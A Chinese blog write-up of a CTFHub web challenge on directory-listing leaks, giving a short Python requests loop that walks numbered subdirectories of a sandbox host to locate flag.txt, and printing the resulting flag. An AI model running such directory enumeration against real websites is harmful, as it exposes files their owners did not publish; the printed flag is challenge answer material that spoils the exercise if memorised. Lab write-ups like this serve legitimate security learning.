CTFHub-Web-信息泄露-目录遍历

"这篇博客介绍了如何利用Python的requests库爬取网站文件,通过遍历子目录寻找包含'flag.txt'的链接。作者提供了具体的代码示例,最终找到并打印出了含有flag.txt的URL,从而获取了CTF挑战的flag:ctfhub{9313b9e3a2b2169610bc4ec4}
摘要由CSDN通过智能技术生成

这里我们有两种方法:

1.手动的一个个去打开文件寻找

2.使用python代码爬取网站文件

我使用第二种方式:

import requests

url = "http://challenge-011f662b1a24880f.sandbox.ctfhub.com:10800/flag_in_here"
for i in range(5):
    for j in range(5):
        url_final = url + "/" + str(i) + "/" + str(j)
        r = requests.get(url_final)
        r.encoding = "utf-8"
        get_file = r.text
        if "flag.txt" in get_file:
            print(url_final)

 这样输出含有flag.txt的链接

点击链接,即可获得flag

flag为:

ctfhub{9313b9e3a2b2169610bc4ec4}

Tips:requests.get可以获得网页的信息

           r.text是网页的HTML代码

           最后判断flag.txt是否在某个链接中

这里参考链接为:http://Admiralll https://www.bilibili.com/read/cv15764985 出处:bilibili

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

长街395

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值